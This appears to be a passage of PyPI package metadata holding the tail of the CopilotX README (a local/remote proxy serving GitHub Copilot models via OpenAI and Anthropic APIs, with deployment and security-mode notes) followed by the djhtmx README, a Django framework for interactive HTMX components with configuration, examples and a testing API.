copilotx serve --host 0.0.0.0 # Remote mode (bind all interfaces)
copilotx serve --port 9090 # Custom port (strict — fails if in use)
copilotx config claude-code # Configure for local CopilotX
copilotx config claude-code -u https://... # Configure for remote server
copilotx --version # Show version
```
### Client Configuration
The `config` command auto-generates Claude Code configuration with smart defaults:
```bash
# Local mode — one command, zero prompts
copilotx config claude-code
# → Uses localhost:24680, auto-selects best models
# Remote mode — auto-reads API key from ~/.copilotx/.env
copilotx config claude-code -u https://api.polly.wang
# Custom models (optional)
copilotx config claude-code -m claude-opus-4.6 -s gpt-5-mini
```
Creates `~/.claude/settings.json` using `ANTHROPIC_AUTH_TOKEN` (bypasses Claude Code's API key format validation).
## 🏗️ How It Works
```
Your Tool (Claude Code / Codex / Python script)
│
│ OpenAI Chat / Responses / Anthropic format
▼
┌───────────────────────────────────┐
│ CopilotX (localhost:24680) │
│ │
│ • /v1/chat/completions (pass) │
│ • /v1/responses (pass + fix IDs) │
│ • /v1/messages (Anthropic→OpenAI)│
│ • Vision auto-detection │
│ • apply_patch tool patching │
│ • Token auto-refresh │
└───────────────┬───────────────────┘
│ OpenAI format
▼
api.{individual|enterprise}.githubcopilot.com
├── /chat/completions
└── /responses
(GPT-5, Claude Opus 4.6, Gemini 2.5, ...)
```
CopilotX uses your GitHub Copilot subscription to access models. The correct API endpoint
is **auto-detected** from the Copilot token (`endpoints.api` field) — no hardcoded URLs.
OpenAI requests are **direct passthrough**, Anthropic requests are translated on-the-fly,
and Responses API streams get **ID synchronization** for consistent event tracking.
## 🔍 Port Discovery
When CopilotX starts, it writes `~/.copilotx/server.json`:
```json
{
"host": "127.0.0.1",
"port": 24680,
"pid": 12345,
"started_at": "2026-02-09T12:00:00+00:00",
"base_url": "http://127.0.0.1:24680"
}
```
Other scripts can read this to discover the actual port:
```bash
# Bash/Zsh
PORT=$(python -c "import json; print(json.load(open('$HOME/.copilotx/server.json'))['port'])")
curl http://localhost:$PORT/health
# PowerShell
$info = Get-Content "$HOME\.copilotx\server.json" | ConvertFrom-Json
curl http://localhost:$($info.port)/health
```
The file is automatically cleaned up when the server stops.
## 🌐 Remote Deployment
Deploy CopilotX on a cloud VM to access your Copilot models from anywhere.
### Quick Setup (Azure VM / any Linux server)
```bash
# 1. Install
pip install copilotx
# 2. Authenticate
copilotx auth login
# 3. Set API key for remote protection
export COPILOTX_API_KEY=$(openssl rand -hex 32)
echo "Save this key: $COPILOTX_API_KEY"
# 4. Start in remote mode
copilotx serve --host 0.0.0.0
```
### Production Setup with Nginx + systemd
For production deployments with HTTPS, we recommend using Nginx as the reverse proxy.
**1. Install and configure systemd service:**
```bash
# Copy and customize the systemd service template
sudo cp deploy/copilotx.service /etc/systemd/system/
# Create environment file with your API key
mkdir -p ~/.copilotx
echo "COPILOTX_API_KEY=$(openssl rand -hex 32)" > ~/.copilotx/.env
# Enable and start service
sudo systemctl daemon-reload
sudo systemctl enable --now copilotx
```
**2. Configure Nginx reverse proxy:**
```bash
# Copy the Nginx config template
sudo cp deploy/nginx-copilotx.conf /etc/nginx/sites-available/copilotx
sudo ln -s /etc/nginx/sites-available/copilotx /etc/nginx/sites-enabled/
# Get SSL certificate with Let's Encrypt
sudo certbot --nginx -d your-domain.com
# Reload Nginx
sudo nginx -t && sudo systemctl reload nginx
```
The `deploy/` directory includes ready-to-use templates:
- `copilotx.service` — systemd service unit (generic)
- `copilotx-azureuser.service` — systemd service unit (Azure VM with virtualenv)
- `nginx-copilotx.conf` — Nginx reverse proxy with SSL, rate limiting, and SSE support
- `nginx-copilotx-http.conf` — Temporary HTTP-only config for initial Let's Encrypt setup
- `Caddyfile` — Alternative Caddy config (simpler setup with auto-HTTPS)
- `.env.example` — Environment variables template
### Security Model
| Mode | Host | API Key | Behavior |
|------|------|---------|----------|
| **Local** | `127.0.0.1` (default) | Not needed | Fully open, localhost only |
| **Remote (protected)** | `0.0.0.0` | `COPILOTX_API_KEY` set | Localhost exempt, remote needs Bearer token |
| **Remote (open)** | `0.0.0.0` | Not set | ⚠️ Warning shown, fully open |
**Accessing from remote:**
```bash
# Use Bearer token
curl https://your-domain.com/v1/models \
-H "Authorization: Bearer YOUR_API_KEY"
# Or x-api-key header
curl https://your-domain.com/v1/models \
-H "x-api-key: YOUR_API_KEY"
```
**With OpenAI SDK:**
```python
client = OpenAI(
base_url="https://your-domain.com/v1",
api_key="YOUR_COPILOTX_API_KEY",
)
```
## 📋 Version Roadmap
| Version | Codename | Features |
|---------|----------|----------|
| v1.0.0 | Local | OAuth, dual API, streaming, model discovery |
| v2.0.0 | Remote | API key auth, remote deploy, Nginx/Caddy + systemd templates |
| v2.1.0 | Codex | Responses API, vision support, dynamic API URL, stream ID sync |
| v2.2.0 | Config | `copilotx config` command for client setup (Claude Code) |
| **v2.3.x** | **Polish** | **Error passthrough, stream error handling, test suite** |
| v3.0.0 | Multi-User | Token pool, user database, OpenRouter mode |
## ⚠️ Disclaimer
This tool is for **personal local use only**. Please comply with
[GitHub Copilot Terms of Service](https://docs.github.com/en/copilot/overview-of-github-copilot/about-github-copilot-individual).
The author is not responsible for any account restrictions resulting from misuse.
## 📄 License
MIT
| text/markdown | null | Polly <im@polly.wang> | null | null | MIT | anthropic, copilot, llm, openai, proxy | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Topic :: Software Development :: Libraries"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"fastapi>=0.115.0",
"httpx>=0.28.0",
"pydantic>=2.10.0",
"rich>=13.9.0",
"typer[all]>=0.15.0",
"uvicorn[standard]>=0.32.0"
] | [] | [] | [] | [
"Homepage, https://github.com/Polly2014/CopilotX",
"Repository, https://github.com/Polly2014/CopilotX",
"Issues, https://github.com/Polly2014/CopilotX/issues"
] | uv/0.9.9 {"installer":{"name":"uv","version":"0.9.9"},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T09:22:31.392740 | copilotx-2.3.3.tar.gz | 76,277 | 18/42/fa43c0b57fdaef827f70dcdf668a9c3103d87be08a142caa349894aec002/copilotx-2.3.3.tar.gz | source | sdist | null | false | 3803204b8414133ce8e4ef186a2c6dba | fe572d8800eb120d8fdeae3b02b2102442dff7b17d71e82c0a694879c643f7e7 | 1842fa43c0b57fdaef827f70dcdf668a9c3103d87be08a142caa349894aec002 | null | [
"LICENSE"
] | 229 |
2.4 | djhtmx | 1.3.8 | Interactive UI Components for Django using HTMX | # djhtmx
[](https://github.com/edelvalle/djhtmx/actions/workflows/ci.yml)
Interactive UI Components for Django using [htmx](https://htmx.org)
## Install
```bash
uv add djhtmx
```
or
```bash
pip install djhtmx
```
# Configuration
## Requirements
djhtmx requires **Redis** to be running for session storage and component state management.
**Important**: Redis is not included with djhtmx and must be installed separately on your system. Make sure Redis is installed and accessible before using djhtmx.
### Installing Redis
- **macOS**: `brew install redis`
- **Ubuntu/Debian**: `sudo apt-get install redis-server`
- **CentOS/RHEL**: `sudo yum install redis` or `sudo dnf install redis`
- **Docker**: `docker run -d -p 6379:6379 redis:alpine`
- **Windows**: Download from [Redis for Windows](https://github.com/microsoftarchive/redis/releases)
Add `djhtmx` to your `INSTALLED_APPS`.
```python
INSTALLED_APPS = [
...
"djhtmx",
...
]
```
Install the Middleware as the last one of the list
```python
MIDDLEWARE = [
...,
"djhtmx.middleware",
]
```
Add `djhtmx.context.component_repo` to the list of context processors:
```python
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
...,
"djhtmx.context.component_repo",
],
},
},
]
```
Expose the HTTP endpoint in your `urls.py` as you wish, you can use any path you want.
```python
from django.urls import path, include
urlpatterns = [
# ...
path("_htmx/", include("djhtmx.urls")),
# ...
]
```
## Settings
djhtmx can be configured through Django settings:
### Required Settings
- **`DJHTMX_REDIS_URL`** (default: `"redis://localhost/0"`): Redis connection URL for session storage and component state management.
### Optional Settings
- **`DJHTMX_SESSION_TTL`** (default: `3600`): Session timeout in seconds. Can be an integer or a `datetime.timedelta` object.
- **`DJHTMX_DEFAULT_LAZY_TEMPLATE`** (default: `"htmx/lazy.html"`): Default template for lazy-loaded components.
- **`DJHTMX_ENABLE_SENTRY_TRACING`** (default: `True`): Enable Sentry tracing integration.
- **`DJHTMX_ENABLE_LOGFIRE_TRACING`** (default: `False`): Enable Logfire tracing integration.
- **`DJHTMX_STRICT_EVENT_HANDLER_CONSISTENCY_CHECK`** (default: `False`): Enable strict consistency checking for event handlers.
- **`DJHTMX_KEY_SIZE_ERROR_THRESHOLD`** (default: `0`): Threshold in bytes for session key size errors (0 = disabled).
- **`DJHTMX_KEY_SIZE_WARN_THRESHOLD`** (default: `51200`): Threshold in bytes for session key size warnings (50KB).
- **`DJHTMX_KEY_SIZE_SAMPLE_PROB`** (default: `0.1`): Probability for sampling session key size checks.
### Example Configuration
```python
# settings.py
# Redis connection (required)
DJHTMX_REDIS_URL = "redis://localhost:6379/0" # or redis://user:password@host:port/db
# Optional settings
DJHTMX_SESSION_TTL = 7200 # 2 hours
DJHTMX_DEFAULT_LAZY_TEMPLATE = "my_app/lazy_component.html"
DJHTMX_ENABLE_SENTRY_TRACING = True
DJHTMX_KEY_SIZE_WARN_THRESHOLD = 100 * 1024 # 100KB
```
In your base template you need to load the necessary scripts to make this work
```html
{% load htmx %}
<!doctype html>
<html>
<head>
{% htmx-headers %}
</head>
</html>
```
## Getting started
**Important**: djhtmx is a framework for building interactive components, not a component library. No pre-built components, templates, or behaviors are provided. You need to create your own components from scratch using the framework's base classes and conventions.
This library is opinionated about how to use HTMX with Django, but it is not opinionated about components, styling, or specific functionality. You have complete freedom to design and implement your components as needed for your application.
This app will look for `htmx.py` files in your app and registers all components found there, but if you load any module where you have components manually when Django boots up, that also works.
### Component Organization
As of version 1.2.0, djhtmx supports both single file and directory-based component organization:
**Single file (traditional):**
```
myapp/
├── htmx.py # All components in one file
└── ...
```
**Directory structure (new in v1.2.0):**
```
myapp/
├── htmx/
│ ├── __init__.py
│ ├── components.py # Basic components
│ ├── forms.py # Form components
│ └── widgets/
│ ├── __init__.py
│ ├── calendar.py # Calendar widgets
│ └── charts.py # Chart widgets
└── ...
```
The autodiscovery system will recursively find and import all Python modules under `htmx/` directories, allowing you to organize your components in a structured way that scales with your project size.
```python
from djhtmx.component import HtmxComponent
class Counter(HtmxComponent):
_template_name = "Counter.html"
counter: int = 0
def inc(self, amount: int = 1):
self.counter += amount
```
The `inc` event handler is ready to be called from the front-end to respond to an event.
The `counter.html` would be:
```html
{% load htmx %}
<div {% hx-tag %}>
{{ counter }}
<button {% on "inc" %}>+</button>
<button {% on "inc" amount=2 %}>+2</button>
</div>
```
When the event is dispatched to the back-end the component state is reconstructed, the event handler called and then the full component is rendered back to the front-end.
Now use the component in any of your html templates, by passing attributes that are part of the component state:
```html
{% load htmx %}
Counters: <br />
{% htmx "Counter" %} Counter with init value 3:<br />
{% htmx "Counter" counter=3 %}
```
## Doing more complicated stuff
### Authentication
All components have a `self.user` representing the current logged in user or `None` in case the user is anonymous. If you wanna make sure your user is properly validated and enforced. You need to create a base component and annotate the right user:
```python
from typing import Annotated
from pydantic import Field
from djhtmx.component import HtmxComponent
class BaseComponent(HtmxComponent, public=False):
user: Annotated[User, Field(exclude=True)]
class Counter(BaseComponent):
_template_name = "Counter.html"
counter: int = 0
def inc(self, amount: int = 1):
self.counter += amount
```
### Non-public components
These are components that can't be instantiated using `{% htmx "ComponentName" %}` because they are used to create some abstraction and reuse code.
Pass `public=False` in their declaration
```python
class BaseComponent(HtmxComponent, public=False):
...
```
### Model Loading Optimization
Components can optimize database queries when loading Django models:
```python
from typing import Annotated
from djhtmx.introspection import ModelConfig
class TodoComponent(HtmxComponent):
# Basic: loads immediately when component is created
item: Item
# Optional: returns None if object doesn't exist (e.g., was deleted)
archived_item: Item | None = None
# Lazy: defers loading until accessed
user: Annotated[User, ModelConfig(lazy=True)]
# Optimized: use select_related for foreign keys, prefetch_related for reverse FKs/M2M
todo_list: Annotated[
TodoList,
ModelConfig(
lazy=True,
select_related=["owner", "category"],
prefetch_related=["items", "items__tags"]
)
]
```
**Handling Deleted Objects:**
Lazy models handle deleted database objects gracefully:
```python
class MyComponent(HtmxComponent):
# Required: raises ObjectDoesNotExist when checking if object was deleted
item: Annotated[Item, ModelConfig(lazy=True)]
# Optional: becomes falsy and returns None when object was deleted
archived_item: Annotated[Item | None, ModelConfig(lazy=True)]
```
- **Required lazy models**: Checking truthiness (`if component.item:`) raises `ObjectDoesNotExist` with a clear message
- **Optional lazy models**: Checking truthiness returns `False`, field accesses return `None`
- **Both**: Accessing `.pk` always works without triggering database queries
## Component nesting
Components can contain components inside to decompose the behavior in more granular and specialized parts, for this you don't have to do anything but to a component inside the template of other component....
```python
class Items(HtmxComponent):
_template_name = "Items.html"
def items(self):
return Item.objects.all()
class ItemEntry(HtmxComponent):
...
item: Item
is_open: bool = False
...
```
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" item=item %}
{% endfor %}
</ul>
```
In this case every time there is a render of the parent component all children components will also be re-rendered.
How can you preserve the state in the child components if there were some of them that were already had `is_open = True`? The state that is not passed directly during instantiation to the component is retrieved from the session, but the component needs to have consistent id. To do this you have to pass an `id` to the component.
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" id="item-"|add:item.id item=item %}
{% endfor %}
</ul>
```
## Lazy lading
If you want some component to load lazily, you pass `lazy=True` where it is being instantiated.
`Items.html`:
```html
{% load htmx %}
<ul {% hx-tag %}>
{% for item in items %}
{% htmx "ItemEntry" id="item-"|add:item.id item=item lazy=True %}
{% endfor %}
</ul>
```
This makes the component to be initialized, but instead of rendering the template in `_template_name` the template defined in `_template_name_lazy` will be rendered (you can override this). When the component arrives to the front-end it will trigger an event to render it self.
## Implicit parameters
When sending an event to the back-end sometimes you can pass the parameters explicitly to the event handler, and sometimes these are inputs the user is typing stuff on. The value of those inputs are passed implicitly if they nave a `name="..."` attribute.
```python
class Component(HtmxComponent):
...
def create(self, name: str, is_active: bool = False):
Item.objects.create(name=name, is_active=is_active)
```
```html
{% load htmx %}
<form {% hx-tag %} {% on "submit" "create" %}>
<input type="text" name="name">
<input type="checkbox" name="is_active">
<button type="submit">Create!</button>
</form>
```
The parameters of any event handler are always converted by pydantic to the annotated types. It's suggested to properly annotate the event handler parameter with the more restrictive types you can.
### Data structures in implicit parameters
Suppose that you have a multiple choice list and you want to select multiple options, you can do this by suffixing the name with `[]` as in `choices[]`:
```python
class DeleteSelection(HtmxComponent):
@property
def items(self):
return self.filter(owner=self.user)
def delete(self, selected: list[UUID] | None = None):
if selected:
self.items.filter(id__in=selected).delete()
```
```html
{% load htmx %}
<form {% hx-tag %} {% on "submit" "delete" %}>
<h1>Select items to be deleted</h1>
{% for item in items %}
<p>
<input
type="checkbox"
name="selected[]"
value="{{ item.id }}"
id="checkbox-{{ item.id }}"
/>
<label for="checkbox-{{ item.id }}">{{ item.name}}</label>
</p>
{% endfor %}
<p><button type="submit">Delete selected</button></p>
</form>
```
## Commands
Each event handler in a component can yield commands for the library to execute. These are useful for skipping the default component render, redirecting the user, remove the component from the front-end, updating other components, and rendering components with custom context.
### Redirects
Wanna redirect the user to some object url:
- If you have the url directly you can `yield Redirect(url)`.
- If you want Django to resolve the url automatically use: `yield Redirect.to(obj, *args, **kwargs)` as you would use `django.shortcuts.resolve_url`.
```python
from djhtmx.component import HtmxComponent, Redirect
class Component(HtmxComponent):
...
def create(self, name: str):
item = Item.objects.create(name=name)
yield Redirect.to(item)
```
If you want to open the url in a new url use the `yield Open...` command with similar syntax to `Redirect`.
### Remove the current component from the interface
Sometimes you want to remove the component when it responds to an event, for that you need to `yield Destroy(component_id: str)`. You can also use this to remove any other component if you know their id.
```python
from djhtmx.component import HtmxComponent, Destroy
class Notification(HtmxComponent):
...
def close(self):
yield Destroy(self.id)
```
### Skip renders
Sometimes when reacting to a front-end event is handy to skip the default render of the current component, to achieve this do:
```python
from djhtmx.component import HtmxComponent, Redirect
class Component(HtmxComponent):
...
def do_something(self):
...
yield SkipRender(self)
```
### Partial Rendering
Sometimes you don't want to do a full component render, but a partial one. Specially if the user if typing somewhere to filter items and you don't wanna interfere with the user typing or focus. Here is the technique to do that:
```python
from djhtmx.component import HtmxComponent, Render
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: str = ""
@property
def items(self):
items = Item.objects.all()
if self.query:
items = items.filter(name__icontains=self.query)
return items
def filter(self, query: str):
self.query = query.trim()
yield Render(self, template="SmartFilter_list.html")
```
`SmartFilter.html`:
```html
{% load htmx %}
<div {% hx-tag %}>
<input type="text" name="query" value="{{ query }}">
{% include "SmartFilter_list.html" %}
</div>
```
`SmartFilter_list.html`:
```html
<ul {% oob "list" %}>
{% for item in items %}
<li><a href="{{ item.get_absolute_url }}">{{ item }}</a></li>
{% empty %}
<li>Nothing found!</li>
{% endfor %}
</ul>
```
- Split the component in multiple templates, the main one and the partial ones.
- For readability prefix the name of the partials with the name of the parent.
- The partials need a single root HTML Element with an id and the `{% oob %}` tag next to it.
- When you wanna do the partial render you have to `yield Render(self, template=...)` with the name of the partial template, this will automatically skip the default full render and render the component with that partial template.
### Rendering with Custom Context
Sometimes you need to render a component with custom context data that differs from the component's state. The `Render` command supports an optional `context` parameter that allows you to override the component's context:
```python
from djhtmx.component import HtmxComponent, Render
class DataVisualization(HtmxComponent):
_template_name = "DataVisualization.html"
def show_filtered_data(self, filter_type: str):
# Get some custom data that's not part of component state
custom_data = self.get_filtered_data(filter_type)
# Render with custom context
yield Render(
self,
template="DataVisualization_filtered.html",
context={
"filtered_data": custom_data,
"filter_applied": filter_type,
"timestamp": datetime.now()
}
)
```
When using custom context:
- The provided context overrides the component's default context
- Essential HTMX variables (`htmx_repo`, `hx_oob`, `this`) are preserved
- The component's state remains unchanged - only the rendering context is modified
- This is particularly useful for displaying computed data, temporary states, or external data that shouldn't be part of the component's persistent state
## Query Parameters & State
Coming back to the previous example let's say that we want to persist the state of the `query` in the URL, so in case the user refreshes the page or shares the link the state of the component is partially restored. For do the following:
```python
from typing import Annotated
from djhtmx.component import HtmxComponent
from djhtmx.query import Query
class SmartFilter(HtmxComponent):
...
query: Annotated[str, Query("query")] = ""
...
```
Annotating with Query causes that if the state of the query is not explicitly passed to the component during instantiation it is taken from the query string of the current URL.
There can be multiple components subscribed to the same query parameter or to individual ones.
If you want now you can split this component in two, each with their own template:
```python
from typing import Annotated
from djhtmx.component import HtmxComponent, SkipRender
from djhtmx.query import Query
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: Annotated[str, Query("query")] = ""
def filter(self, query: str):
self.query = query.trim()
yield SkipRender(self)
class SmartList(HtmxComponent):
_template_name = "SmartList.html"
query: Annotated[str, Query("query")] = ""
@property
def items(self):
items = Item.objects.all()
if self.query:
items = items.filter(name__icontains=self.query)
return items
```
Instantiate next to each other:
```html
<div>
...
{% htmx "SmartFilter" %}
{% htmx "SmartList" %}
...
</div>
```
When the filter mutates the `query`, the URL is updated and the `SmartList` is awaken because the both point to the same query parameter, and will be re-rendered.
## Signals
Sometimes you modify a model and you want not just the current component to react to this, but also trigger re-renders of other components that are not directly related to the current one. For this signals are very convenient. These are strings that represent topics you can subscribe a component to and make sure it is rendered in case any of the topics it subscribed to is triggered.
Signal formats:
- `app_label.modelname`: Some mutation happened to a model instance of this kind
- `app_label.modelname.instance_pk`: Some mutation happened to this precise instance of model
- `app_label.modelname.instance_pk.created`: This instance was created
- `app_label.modelname.instance_pk.updated`: This instance was updated
- `app_label.modelname.instance_pk.deleted`: This instance was deleted
When an instance is modified the mode specific and not so specific signals are triggered.
Together with them some other signals to related models are triggered.
Example: if we have a Todo list app with the models:
```python
class TodoList(Model):
...
class Item(Model):
todo_list = ForeignKey(TodoList, related_name="items")
```
And from the list with id `932` you take a item with id `123` and update it all this signals will be triggered:
- `todoapp.item`
- `todoapp.item.123`
- `todoapp.item.123.updated`
- `todoapp.todolist.932.items`
- `todoapp.todolist.932.items.updated`
### How to subscribe to signals
Let's say you wanna count how many items there are in certain Todo list, but your component does not receive an update when the list is updated because it is out of it. You can do this.
```python
from djhtmx.component import HtmxComponent
class ItemCounter(HtmxComponent):
todo_list: TodoList
def subscriptions(self):
return {
f"todoapp.todolist.{self.todo_list.id}.items.deleted",
f"todoapp.todolist.{self.todo_list.id}.items.created",
}
def count(self):
return self.todo_list.items.count()
```
This will make this component re-render every time an item is added or removed from the list `todo_list`.
## Dispatching Events between components
Sometimes is handy to notify components in the same session that something changed and they need to perform the corresponding update and `Query()` nor Signals are very convenient for this. In this case you can `Emit` events and listen to them.
Find here an implementation of `SmartFilter` and `SmartItem` using this mechanism:
```python
from dataclasses import dataclass
from djhtmx.component import HtmxComponent, SkipRender, Emit
@dataclass(slots=True)
class QueryChanged:
query: str
class SmartFilter(HtmxComponent):
_template_name = "SmartFilter.html"
query: str = ""
def filter(self, query: str):
self.query = query.trim()
yield Emit(QueryChanged(query))
yield SkipRender(self)
class SmartList(HtmxComponent):
_template_name = "SmartList.html"
query: str = ""
def _handle_event(self, event: QueryChanged):
self.query = event.query
@property
def items(self):
items = Item.objects.all()
if self.query:
items = items.filter(name__icontains=self.query)
return items
```
The library will look in all components if they define `_handle_event(event: ...)` and based on the annotation of `event` subscribe them to those events. This annotation can be a single type or a `Union` with multiple even types.
## Inserting a component somewhere
Let's say that we are making the TODO list app and we want that when a new item is added to the list there is not a full re-render of the whole list, just that the Component handling a single Item is added to the list.
```python
from djhtmx.component import HtmxComponent, SkipRender, BuildAndRender
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
yield BuildAndRender.prepend(
f"#{self.id} .list",
ItemComponent,
id=f"item-{item.id}",
item=item,
)
yield SkipRender(self)
class ItemComponent(HtmxComponent):
...
item: Item
...
```
`TodoListComponent.html`:
```html
{% load htmx %}
<div {% hx-tag %}>
<form {% on "submit" "create" %}>
<input type="text" name="name">
</form>
<ul class="list">
{% for item in items %}
{% htmx "ItemComponent" id="item-"|add:item.id item=item %}
{% endfor %}
</ul>
</div>
```
Use the `BuildAndRender.<helper>(target: str, ...)` to send a component to be inserted somewhere or updated.
### Cascade Deletion
You can establish parent-child relationships so that when a parent component is destroyed, all its children are automatically destroyed recursively. This prevents memory leaks in complex component hierarchies.
#### Using BuildAndRender with parent_id
```python
class TodoListComponent(HtmxComponent):
def create(self, name: str):
item = self.todo_list.items.create(name=name)
# Child component that will be automatically destroyed when parent is destroyed
yield BuildAndRender.append(
"#todo-items",
ItemComponent,
parent_id=self.id, # Establishes parent-child relationship
id=f"item-{item.id}",
item=item
)
class Dashboard(HtmxComponent):
def show_modal(self):
# Modal becomes child of dashboard - destroyed when dashboard is destroyed
yield BuildAndRender.prepend("body", SettingsModal, parent_id=self.id)
```
#### Template Tag Automatic Tracking
When you use `{% htmx "ComponentName" %}` inside another component's template, parent-child relationships are automatically established:
```html
<!-- In TodoList.html template -->
{% load htmx %}
<div {% hx-tag %}>
{% for item in items %}
<!-- Each TodoItem automatically becomes a child of this TodoList -->
{% htmx "ItemComponent" id="item-"|add:item.id item=item %}
{% endfor %}
</div>
```
When the parent TodoList is destroyed, all child ItemComponent instances are automatically cleaned up.
#### Updating Components
Use `BuildAndRender.update()` to update existing components (preserves existing parent-child relationships):
```python
# Update existing component without changing relationships
yield BuildAndRender.update(SidebarWidget, data=sidebar_data)
```
## Focusing an item after render
Let's say we want to put the focus in an input that inside the new ItemComponent rendered, for this use `yield Focus(target)`
```python
from djhtmx.component import HtmxComponent, SkipRender, BuildAndRender, Focus
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
item_id = f"item-{item.id}"
yield BuildAndRender.prepend(
f"{self.id} .list",
ItemComponent,
id=item_id,
item=item,
)
yield Focus(f"#{item_id} input")
yield SkipRender(self)
```
## Scrolling an item into view
Use `ScrollIntoView` to scroll an element into the viewport with configurable behavior:
```python
from djhtmx.component import HtmxComponent, ScrollIntoView
class NotificationComponent(HtmxComponent):
_template_name = "NotificationComponent.html"
def show_error(self, message: str):
self.error_message = message
# Scroll to the error message
yield ScrollIntoView("#error-message")
```
### Parameters
- `selector` (str): CSS selector of the element to scroll into view
- `behavior` (str): Scroll behavior - `"smooth"` (default), `"auto"`, or `"instant"`
- `block` (str): Vertical alignment - `"center"` (default), `"start"`, `"end"`, or `"nearest"`
- `if_not_visible` (bool): When `True`, only scrolls if the element is not fully visible in the viewport (default: `False`)
### Conditional scrolling example
Use `if_not_visible=True` to avoid unnecessary scrolling when the element is already in view:
```python
from djhtmx.component import HtmxComponent, ScrollIntoView
class SearchResults(HtmxComponent):
_template_name = "SearchResults.html"
query: str = ""
def search(self, query: str):
self.query = query
# Only scroll to results if they're not already visible
yield ScrollIntoView(
"#results",
behavior="smooth",
block="start",
if_not_visible=True
)
```
## Sending Events to the DOM
Suppose you have a rich JavaScript library (graphs, maps, or anything...) in the front-end and you want to communicate something to it because it is subscribed to some dome event. For that you can use `yield DispatchDOMEvent(target, event, detail, ....)`
```python
from djhtmx.component import HtmxComponent, DispatchDOMEvent
class TodoListComponent(HtmxComponent):
_template_name = "TodoListComponent.html"
todo_list: TodoList
def create(self, name: str):
item = self.todo_list.items.create(name=name)
yield DispatchDOMEvent(
"#leaflet-map",
"new-item",
{"id": item.id, "name": item.name, "geojson": item.geojson}
)
```
This will trigger that event in the front-end when the request arrives allowing rich JavaScript components to react accordingly without full re-render.
## Template Tags you should know about
- `{% htmx-headers %}`: put it inside your `<header></header>` to load the right scripts and configuration.
```html
<header>
{% htmx-headers %}
</header>
```
- `{% htmx <ComponentName: str> **kwargs %}`: instantiates and inserts the result of rendering that component with those initialization parameters.
```html
<div>
{% htmx 'Button' document=document name='Save Document' is_primary=True %}
</div>
```
- `{% hx-tag %}`: goes in the root HTML Element of a component template, it sets the component `id` and some other basic configuration details of the component.
```html
<button {% hx-tag %}>
...
</button>
```
- `{% oob <LocalId: str> %}`: goes in the root HTML Element of an element that will used for partial render (swapped Out Of Band). It sets the id of the element to a concatenation of the current component id and whatever you pass to it, and sets the right [hx-swap-oob](https://htmx.org/attributes/hx-swap-oob/) strategy.
```html
<div {% oob "dropdown" %} class="dropdown">
...
</div>
```
- `{% on <EventName: str> <EventHandler: str> **kwargs %}` binds the event handler using [hx-trigger](https://htmx.org/attributes/hx-trigger/) to an event handler in the component with certain explicit parameters. Implicit parameters are passed from anything that has a name attribute defined inside the component.
```html
<button {% on "click" "save" %}>
...
</button>
```
- `{% class <ClassName: str>: <BooleanExpr: bool>[, ...] %}` used inside of any html tag to set the class attribute, activating certain classes when corresponding boolean expression is `True`.
```html
<button {% class "btn": True, "btn-primary": is_primary %}>
...
</button>
```
## Testing
This library provides the class `djhtmx.testing.Htmx` which implements a very basic a dumb runtime for testing components. How to use:
> Note: When working with lxml elements in tests, avoid truth-testing (e.g., `if elem:` or `if parent := elem.getparent()`). Use explicit `elem is not None` checks to prevent future warnings.
```python
from django.test import Client, TestCase
from djhtmx.testing import Htmx
from .models import Item
class TestNormalRendering(TestCase):
def setUp(self):
Item.objects.create(text="First task")
Item.objects.create(text="Second task")
self.htmx = Htmx(Client())
def test_todo_app(self):
self.htmx.navigate_to("/todo")
[a, b] = self.htmx.select('[hx-name="TodoItem"] label')
self.assertEqual(a.text_content(), "First task")
self.assertEqual(b.text_content(), "Second task")
[count] = self.htmx.select(".todo-count")
self.assertEqual(count.text_content(), "2 items left")
# Add new item
self.htmx.type("input.new-todo", "3rd task")
self.htmx.trigger("input.new-todo")
[count] = self.htmx.select(".todo-count")
self.assertEqual(count.text_content(), "3 items left")
[a, b, c] = self.htmx.select('[hx-name="TodoItem"] label')
self.assertEqual(a.text_content(), "First task")
self.assertEqual(b.text_content(), "Second task")
self.assertEqual(c.text_content(), "3rd task")
```
### API
`Htmx(client: Client)`: pass a Django test client, that can be authenticated if that's required.
`htmx.navigate_to(url, *args, **kwargs)`: This is used to navigate to some url. It is a wrapper of `Client.get` that will retrieve the page and parse the HTML into `htmx.dom: lxml.html.HtmlElement` and create a component repository in `htmx.repo`.
`htmx.url -> str`: Returns the current URL composed of the path and query string (without a trailing `?`).
#### State
`htmx.client: Client`: The underlying Django test client.
`htmx.dom: lxml.html.HtmlElement`: Parsed DOM of the current page.
`htmx.repo: djhtmx.repo.Repository`: Component repository for the current page.
`htmx.path: str`: Current path (no query string).
`htmx.query_string: str`: Current query string without the leading `?`.
#### Look-ups
`htmx.select(css_selector: str) -> list[lxml.html.HtmlElement]`: Pass some CSS selector here to retrieve nodes from the DOM, so you can modify them or perform assertions over them.
`htmx.find_by_text(text: str) -> list[lxml.html.HtmlElement]`: Returns the elements whose text matches exactly.
`htmx.get_component_by_type(component_type: type[THtmxComponent]) -> THtmxComponent`: Retrieves the only instance rendered of that component type in the current page. If there is more than one instance this fails.
`htmx.get_components_by_type(component_type: type[THtmxComponent]) -> list[THtmxComponent]`: Retrieves all instances of this component type in the current page.
`htmx.get_component_by_id(component_id: str) -> THtmxComponent`: Retrieves a component by its id from the current page.
`htmx.print(element: lxml.html.HtmlElement)`: Pretty-prints the element HTML with syntax highlighting for debugging.
#### Interactions
